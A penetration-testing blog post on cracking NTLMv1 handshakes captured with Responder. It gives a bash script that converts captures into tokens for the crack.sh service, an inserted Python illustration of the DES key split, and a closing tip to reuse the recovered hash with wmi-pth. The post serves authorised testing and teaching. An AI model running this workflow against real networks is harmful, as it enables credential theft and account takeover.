Cracking NTLMv1 Handshakes with Crack.sh
What
This post shows how to crack NTLMv1 handshakes with the crack.sh service to obtain the NTLM hash. The technique has been public since 2013, but testers often do not use it.
Intro
For most pentesters, running Responder.py is one of the first tasks performed on internal penetration tests. This tool will spoof multicast name resolution queries and give the pentester NTLMv1 and NTLMv2 handshakes. The next step is usually to attempt to crack those handshakes, at a minimum by running them against a wordlist such as crackstation.
An NTLMv1 handshake, however, offers another, usually ignored, cracking option that is guaranteed to give the tester the NTLM hash. Unlike the NTLMv1 handshake, the NTLM hash can be used as a password equivalent in a Windows environment.
Required Reading
MS-CHAPv2 handshakes can be broken into two rounds of 56-bit DES (and a third round using only 2 bytes of the keyspace), which Moxie demonstrated could be cracked by modern FPGAs (https://www.youtube.com/watch?v=sIidzPntdCM).
NTLMv1 handshakes are essentially MS-CHAPv2 handshakes, making them susceptible to the same weakness (https://markgamache.blogspot.ru/2013/01/ntlm-challenge-response-is-100-broken.html).
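The key layout behind that weakness, as an added example that is not part of the original post: the 16-byte NT hash is zero-padded to 21 bytes and cut into three 7-byte DES keys, each of which encrypts the same 8-byte challenge to produce one 8-byte block of the 24-byte response. The function names are hypothetical and the sample input is constructed; the DES step itself is left out.

```python
# Added illustration; function names are hypothetical, not from any tool on this page.
HASH_LEN = 16   # an NT hash is 16 bytes (MD4 output)
SEED_LEN = 7    # each DES key carries 56 key bits = 7 bytes


def split_nt_hash(nt_hash: bytes) -> list:
    """Zero-pad the 16-byte NT hash to 21 bytes and cut it into three 7-byte seeds."""
    if len(nt_hash) != HASH_LEN:
        raise ValueError("NT hash must be exactly 16 bytes")
    padded = nt_hash + b"\x00" * (3 * SEED_LEN - HASH_LEN)
    return [padded[i:i + SEED_LEN] for i in range(0, 3 * SEED_LEN, SEED_LEN)]


def expand_des_key(seed: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes (7 bits per byte) and set odd parity."""
    if len(seed) != SEED_LEN:
        raise ValueError("DES key seed must be exactly 7 bytes")
    bits = int.from_bytes(seed, "big")
    key = bytearray()
    for shift in range(49, -1, -7):
        byte = ((bits >> shift) & 0x7F) << 1
        if bin(byte).count("1") % 2 == 0:
            byte |= 1  # the low bit is the parity bit, not key material
        key.append(byte)
    return bytes(key)


def unknown_bits() -> list:
    """Secret bits per DES key: bytes of each seed that come from the hash, times 8."""
    return [8 * max(0, min(SEED_LEN, HASH_LEN - start))
            for start in range(0, 3 * SEED_LEN, SEED_LEN)]


def total_des_trials() -> int:
    """Worst-case key trials when each response block is searched independently."""
    return sum(2 ** bits for bits in unknown_bits())


if __name__ == "__main__":
    sample = bytes(range(1, 17))  # constructed 16-byte value, not a real hash
    for seed, bits in zip(split_nt_hash(sample), unknown_bits()):
        print(seed.hex(), expand_des_key(seed).hex(), f"{bits} unknown bits")
    print("total trials:", total_des_trials())
```

Because the three blocks are independent, the work is additive (2 x 2^56 + 2^16) rather than the 2^128 a 16-byte secret would suggest, and it does not depend on password strength.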
How do we exploit this?
You can use the crack.sh site to extract the NTLM hash from any MSCHAP or NTLMv1 handshake for 20 bucks. The site doesn't take the challenge/response displayed in Responder directly; instead, you need to convert it to a token.
The script below can be used to convert the Responder output to a token that will be accepted by crack.sh.
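#!/bin/bash
# Convert Responder NTLMv1 captures (user::domain:lmresp:ntresp:challenge)
# into chapcrack arguments that produce a crack.sh token.
if [ $# -lt 1 ]
then
    echo "Usage: ntlm-chapcrack.sh <hash_file> <hash_file2> ..."
    exit 1
fi
for i in "$@"; do
    # Read one capture per line so fields containing spaces are not split
    while IFS= read -r hash
    do
        [ -z "$hash" ] && continue
        user=$(echo "$hash" | cut -f1 -d:)
        domain=$(echo "$hash" | cut -f3 -d:)
        lmresp=$(echo "$hash" | cut -f4 -d:)
        ntresp=$(echo "$hash" | cut -f5 -d:)
        srvchallenge=$(echo "$hash" | cut -f6 -d:)
        # Secret sauce: https://lists.samba.org/archive/samba-technical/2003-July/030974.html
        # An LM response of 8 bytes followed by 16 zero bytes carries a client challenge;
        # the challenge actually used is the first 8 bytes of MD5(server + client challenge).
        if [ "${lmresp:16:32}" == "00000000000000000000000000000000" ]
        then
            clientchallenge=${lmresp:0:16}
            combinedchallenge=$srvchallenge$clientchallenge
            srvchallenge=$(echo "$combinedchallenge" | xxd -r -p | md5sum -b | cut -c1-16)
        fi
        echo
        echo "user:$user"
        echo "domain:$domain"
        echo "lmresponse:$lmresp"
        echo "ntresp:$ntresp"
        echo "challenge:$srvchallenge"
        # Run chapcrack if it is installed; otherwise print the command to run
        chapcrack=$(locate chapcrack.py | head -1)
        if [ -e "$chapcrack" ]
        then
            "$chapcrack" radius -R "$ntresp" -C "$srvchallenge"
        else
            echo "chapcrack.py radius -R $ntresp -C $srvchallenge"
        fi
    done < "$i"
done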
Upload this token to crack.sh, give them 20 bucks, and wait for your NTLM hash.
Another Hash?
Yep, NTLM hashes are password equivalents in a Windows environment. Use a tool like wmi-pth to leverage your newly acquired NTLM hash.